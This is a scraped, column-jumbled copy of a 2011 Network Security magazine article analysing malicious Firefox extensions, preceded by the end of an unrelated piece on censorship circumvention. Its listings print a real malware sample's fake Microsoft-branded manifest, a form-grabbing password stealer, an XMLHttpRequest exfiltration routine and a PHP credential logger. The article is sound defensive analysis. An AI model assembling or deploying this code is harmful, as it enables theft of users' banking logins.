Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.
FEATUREcircumnavigation talk, and also assumes        Times, National Post, and Backbone               <http://www.freedom...
FEATURE                                                                                             extension that is capa...
FEATUREexploited to take control of the entiresystem. Related work on securing exten-        Listing 2: Wrapper function t...
FEATURE                                                                                                 steal sensitive da...
FEATUREData transfer                                  attack is performed on a small business        research interests ar...
Upcoming SlideShare
Loading in …5

Elsevier NESE - Spying on the Browser


Published on

Published in: Technology
  • Be the first to comment

  • Be the first to like this

Elsevier NESE - Spying on the Browser

  1. 1. FEATUREcircumnavigation talk, and also assumes Times, National Post, and Backbone < usage is only taking place in areas of magazine in addition to editing several plate.cfm?page=664>.pervasive filtering. It does not, for exam- security and software development titles. 4. Noman, Helmi; York, Jillian.ple, allow for the many people who will He specialises in security and technology ‘West Censoring East: The Use ofuse such tools in less filtered countries to writing, but is also a documentary film Western Technologies by Middleaccess video content on sites that restrict maker and is currently working on a non- East Censors, 2010-2011’. OpenNetit to domestic users for copyright rea- fiction book project. Initiative, 2011. <http://opennet.sons. Many people use HotspotShield to net/sites/ to video sites such as Hulu or to use WestCensoringEast.pdf>. Referencesthe BBC’s iPlayer, for example. 5. Roberts, Hal; Zuckerman, Ethan; Perhaps, in the broader scheme of 1. Bradbury, Danny. ‘Chaos aims to York, Jillian; Faris, Robert; Palfrey,things, most residents of heavily cen- crack China’s Wall’. The Guardian, John. ‘2010 Circumvention Toolsored countries are happy to use those August 2008. < Usage Report’. Berkman Center forcountries’ own versions of western Internet & Society, October such as search engines and social sorship.hacking>. < For freedom of speech and 2. Deibert, Ronald; Palfrey, John; cations/2010/Circumvention_Tool_anti-censorship activists, the biggest chal- Rohozinski, Rafal; Zittrain, Jonathan. Usage>.lenge may not be technical – it may be ‘Access Controlled: The Shaping 6. Freedom Box Foundation goals page,convincing others to care. of Power, Rights, and Rule in Feb 2011. <http://freedomboxfoun- Cyberspace’. MIT Press, April 2010.>. <>. 7. Zetter, Kim. ‘WikiLeaks PostsAbout the author 3. Kelly, Sanja; Cook, Sarah. ‘Freedom Mysterious ‘Insurance’ File’. Wired,Danny Bradbury is a freelance technol- On the Net 2011: A Global July 2010. < writer who has written regularly for Assessment of Internet and Digital threatlevel/2010/07/wikileaks-insur-titles including The Guardian, Financial Media’. Freedom House, April 2011. ance-file/>.Spying on thebrowser: dissectingthe design of Aditya K Sood Richard J Enbodymalicious extensionsAditya K Sood and Richard J Enbody, Michigan State UniversityBrowsers are a vital component of every computer system as they serve as the sions are used to steal sensitive informa-interface to the Internet. However, the extensible nature of browsers has facili- tion.1,2 Bank fraud is a key target fortated the proliferation of malware infections. In this article, we examine the these malicious of malicious extensions used to steal information from browsers in orderto conduct illegal transactions. The focus is on Mozilla’s Firefox – but other Monolithic designbrowsers that share these characteristics will also share similar vulnerabilities. The monolithic design of browsers is based on the assumption that thisSince a browser is an integral part of rights. In general, malicious extensions approach makes it possible to developthe client-side framework, extensions exploit the browser’s trust with the code with fewer bugs, because of theare platform independent because website, when a user initiates a session. reduced complexity when addressing dif-these extensions communicate with the There have been incidents with Mozilla’s ferent components. The approach usesoperating system using browser access Firefox browser where malicious exten- Inter Process Communication (IPC) to 8 Network Security May 2011
  2. 2. FEATURE extension that is capable of undertaking the following nefarious activities: Listing 1: Fake extension • It can be used with other applications identity described in RDF format by incorporating a JavaScript wrapper function. <?xml version=“1.0”?> • It can perform malicious updates on <RDF xmlns=“” other installed extensions by using xmlns:em=“”> standard API functionality.4 <Description about=“urn:mozilla:install-manifest”> • It uses asynchronous HTTP requests via <em:id>Secure Add On</em:id> AJAX, with associated events to gener- <em:name>Microsoft Safe Browsing Security Policies</em:name> ate listener functions for communica- <em:description>Protect your computer from security threats tion with third-party servers. It can use em:description><em:version>3.2.7</em:version> encrypted protocols for data transfer. <em:creator>Microsoft – 2010</em:creator> • It can interact with the installed plug- ins, such as PDF or Flash, in order to <em:homepageURL> launch malicious code and exploit cer- px</em:homepageURL> tain vulnerabilities in the browser itself. <em:type>2</em:type> <! – Mozilla Firefox – > Unified global <em:targetApplication> <Description> namespace <em:id>{ec8030f7-c20a-464f-9b0e-13a3a9e97384}</em:id> Another factor behind the rapid escala- tion of malicious extensions is the sharing <em:minVersion>3.0</em:minVersion><em:maxVersion>5.*</em:maxVersion> of the same address space and memory as that of the parent browser. Malicious </Description></em:targetApplication></Description></RDF> extensions utilise the global namespace. As an outcome of this design, unrestrictedachieve co-ordination among compo- which would prohibit the browser from operations in the same address space cannents. The parent process allocates mem- running extensions. In general, from an result in subverting the browser compo-ory for all the running instances (tabs) authorisation perspective, there is no nents. Robust policy mechanisms haveof the browser. Similarly, a single process security mechanism applied to extensions. not been deployed for securing the per-handles all the memory-related opera- Therefore, the browser architecture does sistent state of browser extensions. Thetions. Since browsers run in user space, not restrain control over the interface problem lies in the browser design of notthe monolithic interface allows the code used to carry out the operations within compartmentalising components andto run freely because user access rights are different browser components. This weak- applying customised access policies basedutilised for operations. This model can be ness provides an opportunity for develop- on individual roles.exploited by malicious extensions in order ing malicious extensions, thereby exploit-to exploit these useful components in the Firefox case study: ing the default behaviour of browsers.browser address space for nefarious pur- intrinsic behaviourposes. Mozilla uses the monolithic model Unrestricted communication interface and design relevancefor its Firefox browser. A browser runs in the applicationlayer (ring 3). However, the components The communication channel between This case study is an outcome ofhave elevated privileges to interact effi- different browser components is not real-time analysis of one of the mostciently with operating system structures. restricted because of interdependency widely used malicious extensions that isMalicious extensions exploit the follow- among the components. The browser designed for the Mozilla Firefox design components. communication model follows two In order to understand the working basic patterns of communication named behaviour, it’s necessary to take a closeInsecure sandbox Component-to-Component (C2C) look at the design of this extension, and and JavaScript-to-Component (J2C). to examine the prototype of this malwareMalicious extensions in Mozilla utilise Most browsers use the Component extension through the use of code snip-a default extension model for browsers Object Model (COM) for modularisa- pets. Most malware extensions followthat is actually free from sandboxing.3 tion of code – for example, Mozilla uses the paradigm of a client and server sideThere are no appropriate sandbox func- XPCOM. Attackers exploit the default communication model. In addition,tions incorporated for securing extensions communication model and inherent proprietary browser extensions are alsoby reducing privileges and access rights, code modularity to create a malicious vulnerable to security flaws that can be 9May 2011 Network Security
  3. 3. FEATUREexploited to take control of the entiresystem. Related work on securing exten- Listing 2: Wrapper function to steal data in formssions has been done to show the processof designing secure extensions free fromvulnerabilities.5 Of course, malicious window.document.onsubmit = scan_forms;extensions do not care that extensionsshould be secure. //Scan the document forms Generally, the aim of malicious exten- function scan_forms() {sions is to steal sensitive data from var forms = content.document.getElementsByTagName(‘form’);the user and transfer it to an attacker- for(var i=0; i<forms.length; i++) {controlled domain. Malicious extensions if(forms[i].id)exploit the trust model used by the var form = content.document.getElementById(forms[i].id);browser to set a communication channel elsebetween the browser and the website. var form = content.document.forms[i];Usually, this process is completed when for(var c=0; c<form.elements.length; c++) {a session is created with a target web- if(form.elements[c].type == ‘password’ && form.elements[c].value !=site hosted on third-party servers. The ‘‘)detect_information(form);}}}point is that malicious extensions are notprotected by HTTP running over SSL. function detect_information(form) {Most users have a false sense of security //EDIT THIS BELLOW TO MATCH YOUR LOGGIN SCRIPTwhen websites use HTTPS. However, var host = ‘’;this is not justified because HTTPSprotects users only from transport layer //Record time and dateattacks. Ironically, HTTPS actually var currentTime = new Date();protects the malicious session from such var minutes = currentTime.getMinutes();attacks. HTTPS preserves the integ- if (minutes < 10)rity of data, but because the malicious minutes = ‘0’ + minutes;code is within the browser, data can be var date = currentTime.getHours()+’:’+minutes+’ || ‘+currentTime.manipulated even before it enters the getMonth()+1+’/’+currentTime.getDate()+’/’+currentTime.getFullYear();network layer. var info = host+’?time=‘+date+’&p-domain=‘+content.document.location.href; Why doesn’t anti-malware software //Add the collected form datacatch malicious extensions? Malicious for(var c=0; c<form.elements.length; c++)extensions are not scanned by anti- key_strokes += ‘&’+form.elements[c].name+’=‘+form.elements[c].value;malware solutions because extensions send(key_strokes);}are considered to be secure componentsby default. We have seen some browserplug-in integrity checkers that detectthe presence of secure and insecureplug-ins based on the version informa-tion. However, for extensions, this ver-sion scanning technique is not effectivebecause extensions are not proprietarycode used by vendors or software compa-nies. As a result, malicious extensions arenot impacted by antivirus solutions. The basic operation is:1. A user visits a site that has been infected with malicious code.2. The malicious site installs a malicious extension into the user’s browser.3. Within the browser the malicious extension snoops on a user’s browser activity.4. Information collected by the mali- cious extension is sent to an attacker’s Figure 1: Malicious extension installed in victim’s browser. remote server.10 Network Security May 2011
  4. 4. FEATURE steal sensitive data from these forms Listing 3: Data transference through XMLHttpRequest in order to use information (processed data) to launch illegal operations ‘on calls behalf ’ of users. For example, bank websites require a user to validate a //Send the information username and password as well as a function send(key_strokes) { token (sometimes) in order to initi- var xmlhttp; ate a session for financial transactions. if (window.XMLHttpRequest) A malicious extension residing in the xmlhttp = new XMLHttpRequest(); browser uses a wrapper function to else if (window.ActiveXObject) read the submitted form data con- xmlhttp = new ActiveXObject(“Microsoft.XMLHTTP”); tinuously. In this way, data is stolen“GET”,key_strokes,true); well before it enters the network. xmlhttp.send(null)} The browser’s built-in auto-complete functionality aids the stealing process.Visiting malicious description is used by an extension Attackers exploit this design model todomains manager to display information to the user. The file shows that the mali- conduct attacks silently, thereby read- ing data from the web-based forms.An attacker coerces legitimate users cious extension installs itself with an The code presented in Listing 2 showsto visit a malicious domain by using identity of ‘Microsoft Safe Browsing exactly how the data is read from thedifferent types of web attacks, such as Policies’. From the user’s perspective, forms by malicious extensions.Cross-Site Scripting (XSS), clickjack- it appears to be from Microsoft so it In Listing 2, a malicious extensioning, invalidated redirects and phishing must be trustworthy. Figure 1 shows continuously scans and searches theattacks. The attacker exploits social the malicious extension installed in content rendered in the browser toengineering networks and popular web- the victim’s browser. find the forms. If the form is activesites in order to use them as a platform in the session, the code looks for thefor spreading malware. In addition, Snooping form password field. If the password fieldonce the user visits a malicious domain, is not empty then the scan_formsthe attacker uses social engineering information function calls the detect_informationtricks to distribute malicious extensions. Web forms are used for submitting function in order to collect data fromEffectively, the attacker asks the user to information online to the target web- forms and provide a timestamp. Theinstall an extension using a false iden- sites. Attackers write hidden code to host information is also collected.tity, as described next.Fake extension identity Listing 4: PHP-based logging scriptA fake identity is one mode chosenby attackers to fool users. Any exten- <?phpsion present in the browser is listed in //Open log file to append datathe password manager. The attacker $save = fopen(‘key_strokest.txt’, ‘a’);can make these extensions covert. Fornormal cases, malicious extensions are fwrite($save, “########################################nIP =“.$_installed using fake identities. This step SERVER***91;’REMOTE_ADDR’***93;.”n”);is actually a social engineering trick foreach (array_keys($_GET) as $name) {that exploits the ignorance of the user. if($name == ‘time’)The trick works because legitimate fwrite($save, ‘TIME =>‘.$_GET***91;’time’***93;.”n”);users are generally not able to identify elseif($name == ‘p-domain’)the authentic nature of the extension. fwrite($save, ‘DOMAIN => ‘.$_GET***91;’p-domain’***93;.”n”);The code snippet presented in Listing 1 elseshows the fake information used by one fwrite($save, $name.’ = ‘.$_GET***91;$name***93;.”n”);malicious extension. } This information is extracted from //Close the log filethe install.rdf file that is used to fwrite($save, ‘#####################################’.”nn”);configure the malicious extension. fclose($save);This file is used to specify the iden- ?>tity of the extension. The identity 11May 2011 Network Security
  5. 5. FEATUREData transfer attack is performed on a small business research interests are in computer security, it can yield tens or hundreds of thou- computer architecture, web-based distancemechanism sands of dollars. education and parallel processing. He hasOnce information is stolen, an asyn- The steps discussed above illustrate two patents pending on hardware buffer-chronous XML-based HTTP request, one instance of extension-based malware overflow protection, which will prevent mostXMLHttpRequest, is used to transfer the that is used to spy on browsers. The case computer worms and viruses. He recently co-stolen data back to the attacker’s server. study discussed above is an outcome of an authored a CS1 Python book, The PracticeIn Listing 3, the function sends all the analysis of a malicious extension that is of Computing using Python. He may becaptured key strokes to the attacker- designed to steal passwords from the login reached at domain. These key strokes forms from various browsers. Extension- Resourcesare nothing but data entered in the based malware has a potential impact onforms during an active session when the the robustness of browsers. In general, • Ter Louw, M; Lim, JS; Venkatakrishnan,browser is interacting with banking web- it is hard to design dynamic solutions to VN. ‘Enhancing web browser securitysites. The data is captured character by prevent the execution of malicious exten- against malware extensions’. <http://character and transferred to the attacker’s sions. A user has to be aware of the types running PHP-based log manage- of extensions running in the browser and e6w885835035ur27/fulltext.pdf>.ment scripts. their functions. Unauthorised extensions • Florio, Elia; Wüest, Candid. ‘Firefox (unverified) should not be allowed to and Malware: when your browser“In general, it is hard to design install in the browser. bites you’. <http://www.virusbtn.dynamic solutions to prevent com/pdf/conference_slides/2009/the execution of malicious Conclusion Wueest-Florio-VB2009.pdf>.extensions. A user has to beaware of the types of extensions Extensions provide flexibility and portabil- Referencesrunning in the browser and ity in browsers. However, this case study shows an exploitation of the default design 1. Keizer,G. ‘Mozilla yanks pass-their functions. Unauthorised of the browser extension model which word-stealing Firefox add-on’.extensions (unverified) should poses a serious threat to users. Attackers Computerworld, 14 Jul 2010.not be allowed to install in the write sophisticated malware to try to Accessed Apr 2011. <http://browser” exploit the inherent design of browsers. The analysis above shows that extension- cle/9179167/Mozilla_yanks_pass-PHP-based back-end based malware is very hard to detect and it word_stealing_Firefox_add_on>. can interact with the operating system with 2. ‘Mozilla Add-on Extension Stealsserver log module full privileged rights. This poses a grave Login Details’. Spamfighter, 27 JulMalicious extensions communicate with risk to the privacy and security of users. 2010. Accessed Apr 2011. <http://the back-end servers to store stolen infor- offsite. The attacker’s back-end on-Extension-Steals-Login-Details- About the authorsserver remains in a listening state in order 14810-News.htm>.to store information from the infected cli- Aditya K Sood is a security researcher, con- 3. Elliot, Kevin; Binkley, Jim; Hook,ents. Usually, a PHP-based script is used, sultant and PhD candidate at Michigan James. ‘Mozilla Firefox Extensionas presented in Listing 4, to complete log- State University. He has worked in the Security: an overview of potentialging operations. The attacker uploads the security domain for Armorize, COSEINC, attack vectors’. 2 Dec 2009. AccessedPHP file on the domain to open a com- and KPMG and founded SecNiche Apr 2011. <http://web.cecs.pdx.munication channel between the infected Security. He has been an active speaker at edu/~kevine/cs591_firefox_ext_sec_browser and the server. conferences such as RSA, Toorcon, Hacker paper.pdf>. Halted, TRISC, EuSecwest, XCON, 4. Felt, AP. ‘A Survey of FirefoxThe theft OWASP AppSec, CERT-IN and has Extension API Use’. 16 Oct 2009. written content for HITB Ezine, ISSA, Accessed Apr 2011. <http://The data collected from the browser and ISACA, Elsevier, Hakin9 and Usenix passed to the attacker’s back-end Login. He may be reached at adi_ks@ TechRpts/2009/EECS-2009-139.server can be from a variety of sources, pdf>.but one of the most useful is the login Dr Richard Enbody is an Associate 5. Barth, A; Felt, AP; Saxena, P;and password used for banking. With Professor in the Department of Computer Boodman, A. 2009. ‘Protectingthat information in hand, an attacker Science and Engineering, Michigan State Browsers from Extensioncan clean out a bank account. If this University. He joined the faculty in 1987 Vulnerabilities’. 2009. <http://www.attack is performed on an individual it after earning his PhD in Computer Science yield thousands of dollars, but if the from the University of Minnesota. His sions.pdf>.12 Network Security May 2011